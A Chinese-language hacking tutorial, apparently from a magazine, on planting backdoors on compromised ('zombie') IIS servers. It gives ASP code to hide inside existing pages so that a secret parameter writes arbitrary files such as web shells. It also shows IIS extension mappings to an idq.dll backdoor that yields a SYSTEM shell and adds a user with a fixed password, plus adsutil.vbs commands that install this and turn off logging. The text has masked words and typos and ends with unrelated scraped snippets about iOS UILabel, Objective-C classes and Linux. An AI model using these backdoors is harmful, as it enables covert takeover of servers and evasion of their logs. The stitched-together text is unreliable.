和圖1比較一下,圖1的url是http://192.168.1.3/asp/wz/admin.asp,圖2是http://192.168.1.3/asp/wz/admin.asp?id=1,在admin.asp後邊加了乙個引數"?id=1"就多出乙個東東來了。圖2下面這兩個框,你可以在前邊的輸入框裡輸入檔名,後邊的文字框可以複製你要的任意**,點生成按扭可以生成在伺服器上生成cgi/asp/php/aspx等網頁後門或任意文字檔案。這是怎麼做到的呢?只要你將這段**根據提示修改一下插入某個asp網頁**最下端即可。
<%
on error resume next
id=request("id")
if request("id")=1 then
testfile=request.form("name")
msg=request.form("message")
set fs=server.createobject("scripting.filesystemobject")
set thisfile=fs.opentextfile(testfile,8,true,0)
thisfile.writeline(""&msg& "")
thisfile.close
set fs = nothing
%>
<% end if%>
值得注意的是這段**要求伺服器支援fso,並且它不是在所有的asp檔案裡都生效的。像被插入的asp檔案有包含**,即有這樣的**,這段**就不生效了,但不會影響原檔案的使用。如果你會寫asp,你還可以將一些asp後門直接寫在肉雞原有的asp檔案裡。
asp後門放置方法之二在iis管理器中用asp.dll來解析任意字尾名。這樣來做,依次開啟電腦的控制面板-管理工具-inter*** 服務管理器-web站點-右鍵屬性-主目錄-配置-新增。我新增了乙個字尾為lcx的檔案對映,用nt/system32下的asp.dll來解析。像圖3:
這樣做完以後,我們把常用的cmd.asp改名為cmd.lcx,然後執行,你看會發生什麼? 圖4:
一樣是乙個網頁後門。當然,起個什麼字尾顯得更隱蔽,看你的聰明才知智了。
asp後門放置方法之深入研究。我剛才是用了asp.dll來解析字尾為lcx的檔案。如果我們用乙個特殊的dll程式來解析.lcx的字尾呢?如果你會程式設計,當然可以根據自己的需要寫乙個dll程式。不會呢?哈,綠盟袁哥已經為我們寫好了。想到了沒有,就是那個idq.dll呀,可以傳在scripts目錄下用ispc來連線的idq.dll。u漏洞裡提公升許可權常用的。現在我經用這個idq.dll按asp後門方法之二做好映**,那麼會發生什麼呢?可以用它做兩件事。一種是可以通過執行http://targetip/anything.lcx來在對方主機上加乙個名為iisuser,密碼為abcd1234的使用者。圖5:
這個***.lcx可以隨便改名,主機不存在這個檔案也可以。如果你還不滿足,我們用nc登陸主機看看。鍵入如下命令。nc targetip 80
post /%08/ anything.lcx,怎麼樣?登陸上去了吧,在w2k+sp3下它可是system許可權呀。圖6:
原理在這兒限於篇幅我就不講了,你可以上綠盟查查tombkeeper pgn寫的iis配置檔案後門這篇文章。網友czy也寫了乙個同樣的dll程式,用法就是在ie中執行http://ip/*.你設寫的字尾?shell=你要的命令。看一下我用它在肉雞上做的後門吧,我是用它來解析.ph4的字尾。圖7:
看到這裡,你可能要說了,這個iis後門在3389終端裡安裝很方便,在命令列下呢?我們也有辦法。iis預設安裝下,會在/i***pub/adminscripts目錄下生成19個vbs指令碼,我們用其中的乙個adsutil.vbs就可以幫我們裝上這個奇妙的iis後門了。
運用方法如下,我們分8步走,看看命令列下的快樂吧:
1 copy idq.dll %systemroot%/system32/iisapi.dll
將idq.dll copy到系統盤的system32目錄下,重新命名為iisapid.ll
2得到慮擬站點的情況
cscript adsutil.vbs enum /p /w3svc
[/w3svc/info]
[/w3svc/filters]
[/w3svc/2]----------->這些就是擬虛擬站點了
[/w3svc/3]
[/w3svc/4]
[/w3svc/1]
3 得到iis所有的有特權的dll
運後後查得如下dll
5.設定對映
這裡是預設安裝下,在原有iis管理器中的對映加了乙個.lcx的對映,用我們copy過來的iisapi.dll來解析,注意最後一行加的是.lcx的對映,你可以加個別的字尾名對映。
6.增加乙個虛擬目錄,設定虛擬目錄的各項屬性
cscript adsutil.vbs create /w3svc/2/root/root (目錄名叫root)
cscript adsutil.vbs set w3svc/2/root/root/keytype "iiswebvirtualdir"
cscript adsutil.vbs set w3svc/2/root/root/accessread true
cscript adsutil.vbs set w3svc/2/root/root/acces***ecute true
cscript adsutil.vbs set w3svc/2/root/root/accessscript true
7.增加虛擬目錄root的對映.lcx,用iisapi.dll來解析
cscript adsutil.vbs set w3svc/2/root/root/scriptmaps ".lcx,c:/winnt/system32/iisapi.dll,1"
8 不進行日誌記錄
adsutil.vbs set /w3svc/1/root/root/dontlog true
需要說明的是adsutil.vbs 的命令雖然我是研究了好長時間才搞清楚的,但我用上述命令在三颱肉雞和我本機做試驗時,只成功了兩台。得到的結果好像是只有iis原有預設配置沒有被修改的情況下才可以成功。為什麼會這樣,還是借雜誌一角來期待研究過這個指令碼和iis isapi的高手來解答吧,但在iis圖形管理器中這個後門可是百分百成功。
UILabel 的深入研究
建立uilabel與建立uiview的步驟很相似。1 開闢空間並初始化 如果本類有初始化方法,使用自己的 否則 使用父類的 2 設定文字控制相關的屬性 3 新增到父檢視上,用以顯示 4 釋放 uilabel的使用 uilabel onelabel uilabel alloc init 最經常使用的 ...
類的深入研究
1.在 person.h 裡面新增兩個方法宣告 void eat 和 void run import inte ce person nsobject void eat void run end 在 person.m 裡面實現方法 import person.h implementation pers...
Linux架構的深入研究
1.linux其實只用幾個檔案就可以跑了。就是init 必須 rc,inittab.sh.注意,這樣linux其實是在single user模式下,許可權相當於root 2.如果同好們想要更多的功能,就可以新增一些程式來滿足自己的需要。當然,編寫rc和inittab需要一定的指令碼功底,後面我會逐步...